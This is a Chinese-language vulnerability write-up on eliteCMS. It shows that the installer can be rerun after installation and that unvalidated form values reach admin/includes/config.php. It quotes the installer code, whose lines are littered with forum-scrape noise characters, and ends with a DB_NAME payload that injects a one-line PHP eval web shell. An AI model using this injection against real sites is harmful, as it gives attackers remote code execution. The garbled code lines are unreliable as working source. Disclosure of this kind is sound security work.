eliteCMS的安装程序在安装结束后未作锁定,导致黑客可以通过访问安装程序地址进行重复安装。
另外一个漏洞是安装程序可以直接写入一句话到admin/includes/config.php。
我们来看代码:
$ @: a9 |4 H2 c. l( S/ I7 ^* a...
% j5 O" D0 M9 x4 G! Jelseif ($_GET['step'] == "4") {9 }/ M. ^. A$ z8 B% `3 Q% N
$file = "../admin/includes/config.php";& G* w3 @$ k) P. L. [) n5 G
$write = "<?php\n";' r& t# V4 X& T: [. `
$write .= "/**\n";
' K# ~9 _! s+ E $write .= "*\n";
7 ~6 z& S' b# B/ M. Z* p9 u7 x $write .= "*eliteCMS-The LightweightCMS Copyright 2008 elite-graphix.net.\n";
" j [$ X+ y e8 ^ J...略..., b% \6 B2 k7 t1 A
$write .= "*\n";; C$ I f1 I$ j5 c; F& v d7 J9 O
$write .= "*/\n";
) `: [& e2 M4 e* i/ H/ u% x2 b $write .= "\n";
! a- P( X0 ~; n) S7 p3 N" l T; | $write .= "define(\"DB_SERVER\", \"{$_SESSION['DB_SERVER']}\");\n";1 j, x0 P! B( M3 b1 V' f: o/ I
$write .= "define(\"DB_NAME\", \"{$_SESSION['DB_NAME']}\");\n";
0 l u3 S1 L3 v# i $write .= "define(\"DB_USER\", \"{$_SESSION['DB_USER']}\");\n";; q; X& o( E3 h Y2 E9 D
$write .= "define(\"DB_PASS\", \"{$_SESSION['DB_PASS']}\");\n";. i- T) L6 ^4 Z% b; L
$write .= "\$connection = mysql_connect(DB_SERVER, DB_USER, DB_PASS);\n";% Y3 \5 E8 l9 K$ }# U" n
$write .= "if (!\$connection) {\n";
! c- t$ V& D; W8 N( K $write .= " die(\"Database connection failed\" .mysql_error());\n";9 ^$ {+ j. v) k, S
$write .= " \n";- ^- a: R* E% z+ S
$write .= "} \n";% V l! C' V% Y5 q' }' e
$write .= "\$db_select = mysql_select_db(DB_NAME, \$connection);\n";
. |6 Q2 p6 k$ C- D- V $write .= "if (!\$db_select) {\n";
7 o/ _) H* _+ P& V. P1 J0 p2 | $write .= " die(\"Database select failed\" .mysql_error());\n";
; a- P, M% s" t. i+ N $write .= " \n";$ K E; M8 \- I7 v3 w8 Q K% B
$write .= "} \n";: u# v5 b0 S9 T4 M+ ?# B
$write .= "?>\n";2 N! ?2 H z1 d8 |) J
# Z& }) X7 y! G- m8 X $writer = fopen($file, 'w');
9 ]- \7 f1 o, S0 L...3 Q& B9 t* u4 f9 Q
再看代码:
// Copy the database settings submitted by the install form into the session.
// NOTE(review): nothing at this boundary validates or escapes the values, and
// the step-4 handler interpolates them into a double-quoted PHP string literal
// that is written to admin/includes/config.php. The mitigation is to validate
// them here (or emit the file with var_export()) and to refuse to run the
// installer again once installation has completed.
foreach (['DB_SERVER', 'DB_NAME', 'DB_USER', 'DB_PASS'] as $setting) {
    $_SESSION[$setting] = $_POST[$setting];
}
取值未作任何验证。
如果将数据库名的POST数据设为:
, R7 c+ i# w0 L& |/ V" L7 y7 n; p"?><?php eval($_POST[c]);?><?php" G Y" @5 {6 `* P9 U2 I3 C
将导致一句话后门被写入/admin/includes/config.php。
|